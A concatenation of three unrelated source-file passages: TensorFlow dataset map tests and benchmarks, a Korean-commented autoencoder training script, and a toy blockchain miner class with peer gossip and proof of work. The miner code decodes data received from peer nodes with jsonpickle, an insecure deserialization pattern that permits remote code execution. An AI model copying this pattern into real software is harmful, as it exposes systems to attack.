self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
iterator = (
dataset_ops.Dataset.range(105)
.map(lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(100):
self.assertEqual(i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testConstantOutput(self):
iterator = (
dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, b"hello", 10), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
class MapDatasetBenchmark(test.Benchmark):
def benchmarkChainOfMaps(self):
chain_lengths = [0, 1, 2, 5, 10, 20, 50]
for chain_length in chain_lengths:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(0).repeat(None)
for _ in range(chain_length):
dataset = dataset.map(lambda x: x)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element.op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element.op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset chain length: %d Median wall time: %f"
% (chain_length, median_wall_time))
self.report_benchmark(
iters=1000, wall_time=median_wall_time,
name="benchmark_map_dataset_chain_latency_%d" % chain_length)
def benchmarkMapFanOut(self):
fan_outs = [1, 2, 5, 10, 20, 50, 100]
for fan_out in fan_outs:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(
tuple(0 for _ in range(fan_out))).repeat(None).map(lambda *xs: xs)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element[0].op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element[0].op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset fan out: %d Median wall time: %f"
% (fan_out, median_wall_time))
self.report_benchmark(
iters=1000, wall_time=median_wall_time,
name="benchmark_map_dataset_fan_out_%d" % fan_out)
if __name__ == "__main__":
test.main()
|
gis_network2.py
|
import cnn_module as cnn
import numpy as np
import cv2 #화면 출력 용
import gis_data2 as gis_data
import gis_weight
import threading # 화면 출력
# 빠르게 학습하고 싶으면 False로 바꾸세요!.
# 신경망 결과를 그려줍니다.
visible = False
# 연구 결과################
# 히 초기와랑 싸비어 초기화 없으면 loss가 몇싶만 부터 출발함...
# 적용하면 몇천때 부터 시작
# batch norm이 없으면 loss가 떨어 지지 않음.
###########################
# 데이터 레이어 생성
dataList = gis_data.load()
dataLayer = cnn.createDatasetLayer(dataList[0], dataList[0]) # N, 3, 200, 200
print("dataList[0]", dataList[0].shape)
# 옵티마이저 생성
optimizer = cnn.createAda(0.018)
print("가중치 이름을 입력하세요. 만들지 않으면 gis_weight.py를 실행하여 데이터를 만드세요")
weightList = gis_weight.loadWeight(input())
#incoder 네트워크 생성
with cnn.NetworkBuilder() as builder:
builder.createNetwork(6)
builder.addConv3dLayer(weightList[2], weightList[3], weightList[1], 0, 0)
builder.addBatchnormLayer()
builder.addReluLayer()
builder.addFCLayer(weightList[4], weightList[5])
builder.addBatchnormLayer()
builder.addReluLayer()
incoderNet = builder.getNetwork()
#decoder 네트워크 생성
with cnn.NetworkBuilder() as builder:
builder.createNetwork(5)
builder.addFCLayer(weightList[6], weightList[7])
builder.addBatchnormLayer()
builder.addReluLayer()
builder.addFCLayer(weightList[8], weightList[9])
builder.addSigmoidLayer()
decoderNet = builder.getNetwork()
#gan 네트워크 생성
with cnn.NetworkBuilder() as builder:
builder.createNetwork(2)
builder.addNetworkLayer(incoderNet)
builder.addNetworkLayer(decoderNet)
ganNet = builder.getNetwork()
#train 네트워크 생성
with cnn.NetworkBuilder() as builder:
builder.createNetwork(2)
builder.addNetworkLayer(ganNet)
builder.addMeansquareLayer()
trainNet = builder.getNetwork()
trainNet.setLearningData(dataLayer)
trainNet.initForward()
trainNet.initBackward()
if visible:
out = np.zeros(dataList[1].shape)
ganNet.getRightTerminal().out.release_deep()
ganNet.getRightTerminal().out = cnn.Tensor.numpy2Tensor(out)
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
def draw():
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
if __name__ == '__main__':
for i in range(1,1000):
print('epoch',i)
#while(trainNet.forward(0, 1)>0):
# print(',')
# pass
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
trainNet.forward(0, 1)
print('loss',trainNet.out.scalas[0])
#while(trainNet.backward(0,1)>0):
# pass
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
trainNet.backward(0,1)
while(trainNet.update(optimizer,0,1)>0):
pass
if visible:
#t = threading.Thread(target=draw)
#t.start()
cv2.imshow('Out', np.uint8( cv2.normalize(out[0].transpose(1,2,0), None, 0, 255, cv2.NORM_MINMAX) ))
cv2.waitKey(30)
if(i % 15 == 0):
print("auto save")
gis_weight.syncWeight(weightList)
|
miner.py
|
import os
import pickle
import hashlib
import logging
import requests
import jsonpickle
from datetime import timedelta
from multiprocessing import Process, Queue
from ..utils.constants import *
from ..blockchain.data import Data
from ..blockchain.block import Block
from ..client.server import start_server
from ..utils.errors import ChainNotValidError
from ..blockchain.blockchain import Blockchain
from ..utils.utils import split_url_string, create_proper_url_string, Job, encode_file_path_properly
logger = logging.getLogger(__name__)
class Miner(object):
def __init__(self, path_to_chain: str, json_format: bool, port: int, difficulty: int, neighbours: list, force_new_chain: bool) -> None:
"""
Constructor for new ``Miner`` object.
Args:
path_to_chain (str): Path to chain for restore/ backup purposes.
json_format (bool): Use JSON format for chain? Otherwise pickle is used.
port (int): Port of neighbour.
difficulty (int): Amount of trailing 0s for proof of work
neighbours (list): List of known neighbours, e.g. ``["localhost:23456", "miner0815:6666"]``
force_new_chain (bool): Force miner to create a new chain instead of use the existing one.
"""
logger.info("Create 'Miner' object ...")
logger.debug(f"Arguments - path_to_chain: {path_to_chain}, json_format: {json_format}, port: {port}, difficulty: {difficulty}, neighbours: {neighbours}")
logger.debug("Init parent Class.")
super().__init__()
logger.debug(f"Type checks: 'path_to_chain' ...")
if not isinstance(path_to_chain, str):
raise ValueError("'path_to_chain' has to be of type string!")
logger.debug(f"Type checks: 'json_format' ...")
if not isinstance(json_format, bool):
raise ValueError("'json_format' has to be a boolean value!")
logger.debug(f"Type checks: 'port' ...")
if not (isinstance(port, int) and not isinstance(port, bool)) or port < 1 or port > 65535:
raise ValueError("'port' is of wrong type or out of range!")
logger.debug(f"Type checks: 'difficulty' ...")
if not (isinstance(difficulty, int) and not isinstance(difficulty, bool)) or difficulty < 1:
raise ValueError("'difficulty' is of wrong type or lower than 1!")
logger.debug(f"Type checks: 'neighbours' ...")
if not isinstance(neighbours, list):
raise ValueError("'neighbours' has to be of type list!")
for index, neighbour in enumerate(neighbours):
if not isinstance(neighbour, str):
raise ValueError("Elements of 'neighbours' has to be of type string!")
try:
split_url_string(neighbour)
except:
raise ValueError(f"Neighbour at index: {index} of 'neighbours' is not a valid 'ip:port' representation. (Maybe Port out of range or protocol is not in [http, https]?")
logger.debug(f"Type checks done: all valid.")
self._jobs = []
self._port = port
self._queue = None
self._neighbours = set()
self._server_process = None
self._difficulty = difficulty
self._unprocessed_messages = set()
self._blockchain = Blockchain(path_to_chain=encode_file_path_properly(path_to_chain), json_format=json_format, force_new_chain= force_new_chain)
logger.debug(f"Check chain ...")
# check if chain is valid
if not self._is_chain_valid():
#TODO: test
raise ChainNotValidError("Local chain is not valid!")
logger.debug(f"Check chain: valid.")
logger.debug(f"Create neighbours: ...")
for neighbour in neighbours:
if len(self.neighbours) < MAX_NEIGHBOURS:
neighbour_internal = split_url_string(neighbour)
self.neighbours.add(neighbour_internal)
logger.info("Created 'Miner' object.")
logger.debug(f"'Miner' object created.")
def start(self) -> None:
"""
Starts some background ``Job`` s for the Gossip Protocol, Chain syncing, Data syncing, communication thread as well as the server functionalities as process.
Starts the blocking function ``mine()``.
"""
logger.info("Configure and start 'Miner' background tasks ...")
update_neighbour_job = ("Gossip Job", Job(interval=timedelta(seconds=GOSSIP_TIME_SECONDS), execute=self._update_neighbours))
logger.debug(f"Background thread configured: '{update_neighbour_job[0]}' - interval: {GOSSIP_TIME_SECONDS} seconds.")
check_for_longest_chain_job = ("Sync Chain Job", Job(interval=timedelta(seconds=CHAIN_SYNC_TIME_SECONDS), execute=self._check_for_longest_chain))
logger.debug(f"Background thread configured: '{check_for_longest_chain_job[0]}' - interval: {CHAIN_SYNC_TIME_SECONDS} seconds.")
fetch_unprocessed_data_job = ("Sync Unprocessed Data Job)", Job(interval=timedelta(seconds=UNPROCESSED_DATA_SYNC_TIME_SECONDS), execute=self._fetch_unprocessed_data))
logger.debug(f"Background thread configured: '{fetch_unprocessed_data_job[0]}' - interval: {UNPROCESSED_DATA_SYNC_TIME_SECONDS} seconds.")
backup_local_chain_job = ("Backup Local Chain Job", Job(interval=timedelta(seconds=BACKUP_LOCAL_CHAIN_TIME_SECONDS), execute=self._backup_local_chain))
logger.debug(f"Background thread configured: '{backup_local_chain_job[0]}' - interval: {BACKUP_LOCAL_CHAIN_TIME_SECONDS} seconds.")
communicate_job = ("Communication Job", Job(interval=timedelta(seconds=0), execute=self._communicate))
logger.debug(f"Background thread configured: '{communicate_job[0]}'.")
self._queue = Queue()
self._server_process = Process(target=start_server, args=[self.queue, self.port])
logger.debug(f"'Server Process' configured.")
logger.debug("Start 'Miner' background threads ...")
update_neighbour_job[1].start()
logger.debug(f"'{update_neighbour_job[0]}' thread started.")
check_for_longest_chain_job[1].start()
logger.debug(f"'{check_for_longest_chain_job[0]}' thread started.")
fetch_unprocessed_data_job[1].start()
logger.debug(f"'{fetch_unprocessed_data_job[0]}' thread started.")
backup_local_chain_job[1].start()
logger.debug(f"'{backup_local_chain_job[0]}' thread started.")
communicate_job[1].start()
logger.debug(f"'{communicate_job[0]}' thread started.")
self.server_process.start()
logger.debug(f"'Server Process' started.")
logger.info("All 'Miner' background tasks started.")
self.jobs.append(update_neighbour_job)
self.jobs.append(backup_local_chain_job)
self.jobs.append(fetch_unprocessed_data_job)
self.jobs.append(check_for_longest_chain_job)
self.jobs.append(communicate_job)
logger.debug("Start mining ...")
self._mine()
def stop(self) -> None:
"""
Function that gets called when Python was killed. Takes care to shutting down all threads/process and saves the chain to disc.
"""
logger.info("Start shutting down routine.")
for job_name, job in self.jobs:
logger.debug(f"Shutting down '{job_name}' ...")
job.stop()
logger.debug(f"'{job_name}' Stopped.")
logger.debug(f"Shutting down 'Server Process' ...")
self.server_process.terminate()
self.server_process.join()
logger.debug(f"'Server Process' Stopped.")
logger.debug(f"Saving local chain ...")
self.blockchain.save_chain()
logger.debug(f"Chain saved.")
logger.info("Shutting down routine done.")
def _communicate(self) -> None:
"""
Periodical thread to communicate with server process.
"""
if not self._queue.empty():
message = self._queue.get_nowait()
logger.debug(f"Processing message: '{message[0]}'' ...")
if ADD_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{ADD_KEY}'")
self._new_message(message[1])
elif SEND_CHAIN_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_CHAIN_KEY}'")
message[1].send({
"chain": jsonpickle.encode(self.blockchain.chain.copy()),
"length": len(self.blockchain.chain),
})
elif SEND_NEIGHBOURS_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_NEIGHBOURS_KEY}'")
message[1].send({
"neighbours": jsonpickle.encode(self.neighbours.copy()),
"length": len(self.neighbours),
})
elif SEND_DATA_KEY == message[0]:
logger.debug(f"Found handle for message with key: '{SEND_DATA_KEY}'")
message[1].send(jsonpickle.encode(self.unprocessed_data.copy()))
else:
logger.warning(f"Could not find handle for message: '{message[0]}'")
def _proof_of_work(self, last_proof: int, difficulty: int) -> int:
"""
Simple proof of work:
Find a number ``p`` that when hashed with the previous ``block``’s solution a hash with ``difficulty`` trailing 0s is produced.
Args:
last_proof (int): Solution of the last blocks' proof of work
difficulty (int): Amount of trailing 0s for a valid proof of work.
Returns:
int: Solution for this proof of work quiz.
Raises:
ValueError: Will be raised if ``difficulty`` is not a positive integer value.
"""
logger.debug(f"Do Proof of Work. - last_proof: {last_proof}, difficulty: {difficulty}.")
if difficulty <= 0:
raise ValueError("'difficulty' has to be a positive integer value.")
proof = 0
while not self._is_proof_of_work_valid(last_proof, proof, difficulty):
proof += 1
logger.debug(f"Found Proof of Work - last_proof: {last_proof}, difficulty: {difficulty}.")
logger.info(f"Found a valid Proof of Work.")
return proof
def _is_chain_valid(self, chain: list = None) -> bool:
"""
Checks if the given ``chain`` satisfies the following rules:
1. The first (genesis) block:
- ``index`` = 0
- ``previous_hash`` = None
- ``proof`` = None
2. each and every following block:
- ``index``: step size 1 and monotonically increasing (1, 2, 3, 4, ...)
- ``previous_hash``: SHA-256 of the string representation of the preceding block
- ``proof``: has to be valid -> see: :meth:`~Miner.is_proof_of_work_valid`
- ``timestamp``: higher than the timestamp of of preceding block
Args:
chain (list): Optional chain if ``None`` internal representation is used.
Returns:
bool: ``True`` if ``chain`` is valid, ``False`` otherwise.
"""
logger.debug(f"Check if chain is valid.")
previous_block = None
if chain == None:
chain_to_check = self.blockchain.chain
else:
chain_to_check = chain
for index, block in enumerate(chain_to_check):
# rules for genesis block
if index == 0:
# correct genesis block?
if block.index != 0 or block.previous_hash != None or block.proof != None:
logger.debug(f"Genesis Block is not valid: -> What is wrong? index: {block.index != 0}, previous_hash: {block.previous_hash != None}, proof: {block.proof != None}.")
# genesis block is not valid! => wrong chain
return False
# rules for any other block
else:
previous_hash = Miner._hash(previous_block)
if block.index != index or block.previous_hash != previous_hash or not self._is_proof_of_work_valid(previous_block.proof, block.proof, self.difficulty) or previous_block.timestamp >= block.timestamp:
logger.debug(f"Block with index: {block.index} ist not valid: -> What is wrong? index: {block.index != index}, previous_hash: {block.previous_hash != previous_hash}, PoW valid: {self._is_proof_of_work_valid(previous_block.proof, block.proof, self.difficulty)}, timestamp: {previous_block.timestamp >= block.timestamp}.")
# block ist not valid! => wrong chain
return False
previous_block = block
logger.debug(f"Chain is valid.")
return True
def _new_message(self, message: str) -> None:
"""
Adds the new ``message`` to its local cache.
Args:
message (str):
"""
logger.debug(f"Create new unprocessed Data ... - message: '{message}' ...")
data = Data(message)
self.unprocessed_data.add(data)
logger.debug(f"New unprocessed Data created. - message: '{data.message}', id: '{data.id}'")
logger.info(f"New message added. - message: '{data.message}', id: '{data.id}'")
def _backup_local_chain(self) -> None:
"""
Periodical thread to backup the local chain to disc.
"""
logger.debug(f"Backup local chain ... - json_format: {self.blockchain.json_format}")
hash_file_path = f"{os.path.splitext(self.blockchain.path_to_chain)[0]}.hash"
def _do_backup(hash_file_path: str, encoded_chain_hash: str):
"""
Helper function that does the actual backup steps.
Args:
hash_file_path (str): String that describes the path to the hash file.
encoded_chain_hash (str): Hash value of the actual local chain.
"""
if not os.path.isfile(hash_file_path):
# if no hash file exists -> create one with actual hash value
with open(hash_file_path, "w") as hash_file:
logger.debug(f"No existing hash file. Write actual hash value.")
hash_file.write(encoded_chain_hash)
logger.info(f"Backed up chain -> Missing hash file (fixed)")
else:
# All as expected: check hash and backup if necessary
with(open(hash_file_path, "r")) as chain_hash_file:
saved_chain_hash = chain_hash_file.read()
if saved_chain_hash != encoded_chain_hash:
logger.debug(f"Hash of chain on disc differ from local chain hash.")
logger.debug(f"Backup Chain.")
self.blockchain.save_chain()
logger.debug(f"Save new hash file.")
with(open(hash_file_path, "w")) as chain_hash_file:
chain_hash_file.write(encoded_chain_hash)
logger.info(f"Backed up chain -> Chain saved.")
else:
logger.info(f"Backed up chain -> No backup needed.")
if self.blockchain.json_format:
logger.debug(f"Encode to JSON")
encoded_chain = jsonpickle.encode(self.blockchain.chain)
encoded_chain_hash = hashlib.sha256(encoded_chain.encode()).hexdigest()
_do_backup(hash_file_path, encoded_chain_hash)
else:
logger.debug(f"Encode with pickle")
encoded_chain = pickle.dumps(self.blockchain.chain)
encoded_chain_hash = hashlib.sha256(encoded_chain).hexdigest()
_do_backup(hash_file_path, encoded_chain_hash)
def _fetch_unprocessed_data(self) -> None:
"""
Periodical thread to get unprocessed data form neighbours.
=> Broadcasts unprocessed data around the network.
"""
logger.debug(f"Syncing unprocessed data ... - neighbours: '{self.neighbours}'")
old_data = self.unprocessed_data
# ask all neighbours for their data queues.
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch data of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, DATA_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get data of neighbour: '{neighbour}'")
data_queue = jsonpickle.decode(response.json())
self.unprocessed_data.update(data_queue)
logger.debug(f"Data of neighbour: '{neighbour}' added.")
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
if old_data == self.unprocessed_data:
logger.info(f"Synced unprocessed data -> No new data.")
else:
logger.info(f"Synced unprocessed data -> New data.")
logger.debug(f"Syncing unprocessed data done.")
def _is_data_processed(self, data: Data) -> bool:
"""
Checks if ``data`` is already in local chain.
Args:
data (Data): ``Data`` object to check if it exists in the actual chain.
Returns:
bool: ``True`` if unprocessed.
"""
# TODO: speedup with batches:
# in: list of Data objects to check
# out: list of Data objects to mine
logger.debug(f"Check if data is not processed ... - data.id: '{data.id}', data.message: '{data.message}'")
for block in self.blockchain.chain:
if block.data == data:
logger.debug(f"Data is not processed: - data.id: '{data.id}', data.message: '{data.message}'")
return True
logger.debug(f"Data is already processed: - data.id: '{data.id}', data.message: '{data.message}'")
return False
def _update_neighbours(self) -> None:
"""
Periodical thread to update neighbours if limit is not exceeded.
"""
logger.debug(f"Update neighbours ... - neighbours: '{self.neighbours}'")
length_old_neighbours = len(self.neighbours)
# TODO: Delete not accessible neighbours
if len(self.neighbours) < MAX_NEIGHBOURS:
logger.debug(f"Maximum amount of neighbours not exceeded. -> update ...")
# ask all neighbours for their neighbours.
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch neighbours of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, NEIGHBOURS_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get neighbours of neighbour: '{neighbour}'")
new_neighbours = jsonpickle.decode(response.json()["neighbours"])
# TODO check response like in constructor...
# Add unknown miner to 'neighbours', return when max amount of neighbours is reached
for new_neighbour in new_neighbours:
# Do not add own address
self.neighbours.add(new_neighbour)
if len(self.neighbours) >= MAX_NEIGHBOURS:
logger.debug(f"Maximum amount of neighbours exceeded -> Stop syncing")
logger.info(f"Updated neighbours -> New neighbours added.")
return
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
if length_old_neighbours < len(self.neighbours):
logger.info(f"Updated neighbours -> New neighbours added.")
else:
logger.info(f"Updated neighbours -> No new neighbours available.")
logger.debug(f"Update neighbours done.")
def _check_for_longest_chain(self) -> None:
"""
Consensus Algorithm:
Ask each ``neighbour`` for that ``neighbours``.
Add all unknown miner to ``neighbours`` set until maximum amount of neighbours is reached.
"""
logger.debug(f"Syncing chain ... - neighbours: '{self.neighbours}'")
new_chain = None
old_chain = self.blockchain.chain
# only longest chain is of interest
max_length = len(self.blockchain.chain)
for neighbour in self.neighbours.copy():
logger.debug(f"Fetch chain of neighbour: '{neighbour}'")
response = requests.get(create_proper_url_string(neighbour, CHAIN_ENDPOINT))
if response.status_code == HTTP_OK:
logger.debug(f"Get chain of neighbour: '{neighbour}'")
chain = jsonpickle.decode(response.json()['chain'])
length = len(chain)
# chain longer and valid?
if length > max_length and self._is_chain_valid(chain):
logger.debug(f"New chain is longer. - neighbour: '{neighbour}', length of old chain: '{max_length}', length of chain: '{length}'")
max_length = length
new_chain = chain
else:
logger.warning(f"Response of neighbour: '{neighbour}' has bad status_code: '{response.status_code}'")
# replace local chain with longest valid chain of all neighbours network
if new_chain:
self.blockchain.chain = new_chain
logger.debug(f"Longer chain added.")
if old_chain == self.blockchain.chain:
logger.info(f"Synced chain -> Have already longest chain.")
else:
logger.info(f"Synced chain -> New (longer) chain added.")
logger.debug(f"Syncing chain done.")
def _mine(self) -> None:
"""
Blocking Mining loop.
If ``not_processed_messages`` are available it uses a random message an mines a new block.
"""
logger.info(f"Start Mining ...")
logger.debug(f"Start Mining ...")
while True:
if len(self.unprocessed_data) > 0:
data = self.unprocessed_data.pop()
logger.debug(f"There is local unprocessed data. - data.id: '{data.id}', data.message: '{data.message}'")
if not self._is_data_processed(data):
logger.debug(f"Data is not processed -> mine new block. - data.id: '{data.id}', data.message: '{data.message}'")
last_block = self.blockchain.last_block
last_proof = last_block.proof
previous_hash = self._hash(last_block)
# proof of work for new block
proof = self._proof_of_work(last_proof, self.difficulty)
block = self.blockchain.add_new_block(data=data, proof=proof, previous_hash=previous_hash)
logger.debug(f"New Block mined. - block.index: {block.index}, block.proof: {block.proof}, block.previous_hash: {block.previous_hash}, block.timestamp: {block.timestamp}, block.data.id: {block.data.id}, block.data.message: {block.data.message}")
logger.info(f"New block mined. - block.index: {block.index}, block.timestamp: {block.timestamp}")
@staticmethod
def _hash(block: Block) -> str:
"""
Hash a ``Block`` object with SHA-256.
Args:
block (Block): Object of class ``Block`` to hash.
Returns:
